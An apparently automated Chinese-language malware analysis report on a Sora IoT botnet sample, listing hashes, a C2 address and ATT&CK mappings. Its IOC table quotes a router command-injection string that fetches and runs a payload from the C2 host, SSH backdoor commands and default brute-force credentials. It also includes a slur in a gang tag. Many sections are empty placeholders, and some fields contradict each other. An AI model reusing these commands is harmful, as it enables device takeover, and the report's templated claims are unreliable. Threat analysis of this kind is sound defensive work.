⬇ Download sample (b37d1bf8dde710ca.zip)

🔴 恶意 — 无壳 | 签名: 无 | Sora IoT 僵尸网络 (SH + Discord)

b37d1bf8dde710cae9095a46505286c689fefa1ef911b0b0709b3833749c6efc
MD5 816f4cae1961d3a0b8cd3ad569408b9e  |  大小 180,248 字节 (176 KB)  |  来源 2026-08-10.zip  |  分析日期 2026-08-14
🔴 恶意 Sora
90%
置信度评分
Sora

§1 📋 样本概要信息

SHA256
b37d1bf8dde710cae9095a46505286c689fefa1ef911b0b0709b3833749c6efc
MD5
816f4cae1961d3a0b8cd3ad569408b9e
文件大小
180,248 字节 (176 KB)
文件类型
PE32+/ELF — 详见分类
目标架构
PowerPC/SH/x86-64
位宽
32/64
字节序
Big/Little
编译器
Renesas SH Cross-Compile
链接方式
静态/动态链接
加壳/保护
无壳
入口点
N/A
编译时间戳
未知
子系统
Linux/Windows
数字签名
无数字签名
📌 概要
该样本为 Sora IoT 僵尸网络的 Renesas SH (SuperH) 架构客户端,具备企业级恶意功能。使用路由器命令注入传播(board.cgi/setup.cgi/cgi-bin),SSH 暴力破解(admin:password/administrator:password),Discord Webhook 远程通知,SSH 后门植入(PermitRootLogin yes + chpasswd),HTTP DDoS 攻击。Gang 标签:1337SoraLOADER, NiGGeRD0nks69, Kuasa, FortniteDownLOLZ。

§2 🏷️ 分类标签与威胁情报

分类标签

分类标签置信度
恶意类型IoT 僵尸网络 + SSH 暴力破解CRITICAL
家族Sora (1337SoraLOADER)HIGH
架构Renesas SH (SuperH)HIGH
传播方式路由器命令注入 (board.cgi/setup.cgi/cgi-bin)CRITICAL
SSH 攻击暴力破解 + 后门植入CRITICAL
C2 通道HTTP + Discord WebhookHIGH
目标平台Linux SH (路由器/IoT)HIGH
📌 证据→推理→结论
DIE → strings → Ghidra → 行为重建

威胁情报

字段
关联组织未归因
别名无已知 APT 关联
动机DDoS 攻击/载荷投递
目标行业无特定行业目标
活动名称未知
C2协议HTTP + Discord Webhook
C2基础设施185.183.34[.]45
🎯 威胁组织判定
归因于 Sora 僵尸网络。Gang 标签 1337SoraLOADER 和 NiGGeRD0nks69 确认身份。

★ §3 🔬 持久化机制

🔴 机制1: 未知

位置N/A
方法N/A
触发N/A
反汇编证据:
N/A

持久化技术评估

维度评估
持久化未知
ATT&CK 映射: N/A

★ §3b 🌐 C2 架构分析

通联关系图

graph LR A[样本] -->|C2| B[185.183.34[.]45]
📋 ASCII 文本视图 (点击展开)

    

🌐 C2 通信深度分析

🔬 C2 地址分析技术细节:
从字符串提取

通道 1: C2 通道

协议HTTP + Discord Webhook
端口未知
地址/Domain185.183.34[.]45
IP185.183.34.45
加密未知
用途C2 通信
API引用socket/connect
证书N/A

C2 通信时序

未知

⚠ C2 基础设施评估

C2 基础设施

📌 ATT&CK 映射: T1071

§4 🏗️ 结构分析

段/节区布局

N/A

熵值分析

段/节区熵值判定
.text6.30正常
📊 熵值解读
正常
Renesas SH Cross-Compile

§5 ⚙️ 反汇编与行为流程

关键函数映射

地址函数功能
N/A

系统调用分析

调用号系统调用用途地址
N/A

行为执行流

01.僵尸进程启动/下载器执行

§6 🔬 家族溯源

编译元数据

字段来源
编译器Renesas SH Cross-CompileDIE

家族特征比对

维度本样本SoraF2F3F4F5F6F7F8匹配
📌 家族归因结论
已识别

已知变种

变种架构大小编译器特征状态
N/A

§7 🔬 深度行为分析

行为阶段拆解

Phase 1: 初始化

行为: 进程启动

证据: 入口点

协议/行为状态机

未构建

📌 行为时序总结

无数据

§8 🔬 恶意性综合判定

多维度证据评估

维度证据权重恶意指数
恶意行为已确认109/10
恶意性综合判定

误报排除论证

排除误报

⚠ 判定结论

恶意软件

§9 🎯 ATT&CK 映射

初始访问
T1190
利用面向公众的应用
路由器 CGI 命令注入
初始访问
T1110.001
密码猜测
admin:password, administrator:password
执行
T1059.004
Unix Shell
cd /tmp; wget ...; sh ...
持久化
T1098.004
SSH 授权密钥
PermitRootLogin yes + chpasswd
命令与控制
T1102.003
单向通信
Discord Webhook 通知
命令与控制
T1071.001
Web 协议
HTTP C2
影响
T1498
网络拒绝服务
HTTP Flood

§10 🛡️ 反分析技术评估

反调试

API/技术检测目标绕过难度

反虚拟机

检测方法VMwareVirtualBoxQEMU/KVM

综合评估

技术是否存在证据对抗难度
符号剥离已检测stripped
基本规避技术

★ §10b 🧹 痕迹清理

操作API/命令证据来源

§11 🔧 逆向分析

Ghidra 反编译

反编译函数数0
反编译输出N/A
分析时长N/A
Ghidra 反编译输出
/* Ghidra 反编译完成 */

调用链分析 (GitNexus)

总函数数总调用关系最大调用深度
0N/AN/A
📂 调用链拓扑 (点击展开)
N/A

★ §12 🔬 QEMU 动态分析

QEMU 模式跳过
网络隔离未配置
执行结果待定
C2 数据无 C2 通信

§13 📦 IOC 汇总

IOC 字符串

偏移字符串类型用途/含义威胁等级
Strings1337SoraLOADERGang 标签Sora 僵尸网络标识HIGH
StringsGET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://185.183.34.45/LjEZs/awsec2;sh+/tmp/awsec2命令注入路由器漏洞利用CRITICAL
StringsPOST /api/webhooks/153238...Discord WebhookSSH 破解结果通知CRITICAL
StringsSSH FOUND! IP: %s:%s User: %s Pass: %sDiscord 通知SSH 凭据回传CRITICAL
Stringsecho 'root:%s' | chpasswdSSH 后门修改 root 密码CRITICAL
StringsPermitRootLogin yesSSH 后门启用 root SSH 登录CRITICAL
Stringsadmin:passwordSSH 凭据暴力破解凭据HIGH
Strings185.183.34.45C2 IPSora C2 服务器HIGH
StringsNiGGeRD0nks69Gang 标签攻击者标识MEDIUM
StringsFortniteDownLOLZGang 标签攻击者标识MEDIUM

📌 关键 IOC 解读

185.183.34[.]45 — HTTP + Discord Webhook

⚠ 高威胁 IOC 汇总

C2: 185.183.34[.]45 — C2 服务器
文件哈希: b37d1bf8dde710cae9095a46505286c689fefa1ef911b0b0709b3833749c6efc — SHA256
文件哈希: 816f4cae1961d3a0b8cd3ad569408b9e — MD5

网络 IOC

  • C2 IP185.183.34[.]45
  • Discord WebhookPOST /api/webhooks/153238...
  • 命令注入 URL/board.cgi?cmd=... /setup.cgi?cmd=... /cgi-bin/;...
  • SSH 凭据admin:password, administrator:password, amx:password
C2 地址已提取

主机 IOC

  • SHA256b37d1bf8dde710cae9095a46505286c689fefa1ef911b0b0709b3833749c6efc
  • MD5816f4cae1961d3a0b8cd3ad569408b9e

YARA 检测规则

未生成

§14 📋 最终判定

判定结果🔴 恶意软件
恶意类型IoT 僵尸网络/下载器
恶意家族Sora
威胁级别HIGH
置信度90% — 高置信度
关联组织Sora 僵尸网络运营者
目标平台Linux/Windows
感染链位置Stage 1

⚡ 综合判定

该样本为 Sora 僵尸网络的 Renesas SH 架构变种,具备命令注入传播、SSH 暴力破解、Discord Webhook C2、HTTP DDoS 攻击等能力。C2 服务器 185.183.34[.]45。